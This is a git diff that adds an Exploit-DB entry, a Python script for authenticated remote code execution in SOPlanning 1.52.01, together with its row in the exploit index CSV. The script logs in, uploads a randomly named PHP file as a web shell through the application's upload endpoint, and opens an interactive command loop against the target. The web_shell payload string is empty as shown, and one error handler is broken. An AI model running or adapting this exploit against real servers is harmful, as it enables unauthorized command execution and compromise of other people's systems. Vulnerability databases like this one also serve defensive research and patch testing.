diff --git a/exploits/php/webapps/52082.py b/exploits/php/webapps/52082.py new file mode 100755 index 0000000000..3dfdcbfe07 --- /dev/null +++ b/exploits/php/webapps/52082.py @@ -0,0 +1,76 @@ +# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) +# Date: 6th October, 2024 +# Exploit Author: Ardayfio Samuel Nii Aryee +# Version: 1.52.01 +# Tested on: Ubuntu + +import argparse +import requests +import random +import string +import urllib.parse + +def command_shell(exploit_url): + commands = input("soplaning:~$ ") + encoded_command = urllib.parse.quote_plus(commands) + + command_res = requests.get(f"{exploit_url}?cmd={encoded_command}") + if command_res.status_code == 200: + print(f"{command_res.text}") + return + print(f"Error: An erros occured while running command: {encoded_command}") + +def exploit(username, password, url): + target_url = f"{url}/process/login.php" + upload_url = f"{url}/process/upload.php" + link_id = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6)) + php_filename = f"{''.join(random.choices(string.ascii_lowercase + string.digits, k=3))}.php" + + login_data = {"login":username,"password":password} + res = requests.post(target_url, data=login_data, allow_redirects=False) + + cookies = res.cookies + + multipart_form_data = { + "linkid": link_id, + "periodeid": 0, + "fichiers": php_filename, + "type": "upload" + } + + web_shell = "" + + files = { + 'fichier-0': (php_filename, web_shell, 'application/x-php') + } + upload_res = requests.post(upload_url, cookies=cookies,files=files, data=multipart_form_data) + + if upload_res.status_code == 200 and "File" in upload_res.text: + print(f"[+] Uploaded ===> {upload_res.text}") + print("[+] Exploit completed.") + exploit_url = f"{url}/upload/files/{link_id}/{php_filename}" + print(f"Access webshell here: {exploit_url}?cmd=") + + if "yes" == input("Do you want an interactive shell? (yes/no) "): + try: + while True: + command_shell(exploit_url) + except Exception as e: + raise(f"Error: {e}") + else: + pass + + +def main(): + parser = argparse.ArgumentParser(prog="SOplanning RCE", \ + usage=f"python3 {__file__.split('/')[-1]} -t http://example.com:9090 -u admin -p admin") + + parser.add_argument("-t", "--target", type=str, help="Target URL (e.g., http://localhost:8080)", required=True) + parser.add_argument("-u", "--username",type=str,help="username", required=True) + parser.add_argument("-p", "--password",type=str,help="password", required=True) + + args = parser.parse_args() + + exploit(args.username, args.password, args.target) + +main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1389b05a51..8686d7ec5a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -30275,6 +30275,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48074,exploits/php/webapps/48074.txt,"SOPlanning 1.45 - 'by' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,,2020-02-17,2020-02-17,0,,,,,http://www.exploit-db.comsoplanning-1-45.zip, 48089,exploits/php/webapps/48089.txt,"SOPlanning 1.45 - 'users' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,,2020-02-17,2020-02-17,0,,,,,, 48086,exploits/php/webapps/48086.txt,"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,,2020-02-17,2020-02-17,0,,,,,, +52082,exploits/php/webapps/52082.py,"SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)",2024-11-15,cybersploit,webapps,php,,2024-11-15,2024-11-15,0,,,,,, 38478,exploits/php/webapps/38478.txt,"Sosci Survey - Multiple Vulnerabilities",2013-04-17,"T. Lazauninkas",webapps,php,,2013-04-17,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/59278/info 4282,exploits/php/webapps/4282.txt,"SOTEeSKLEP 3.5RC9 - 'file' Remote File Disclosure",2007-08-13,dun,webapps,php,,2007-08-12,,1,OSVDB-38454;CVE-2007-4369,,,,, 41558,exploits/php/webapps/41558.txt,"Soundify 1.1 - 'tid' SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,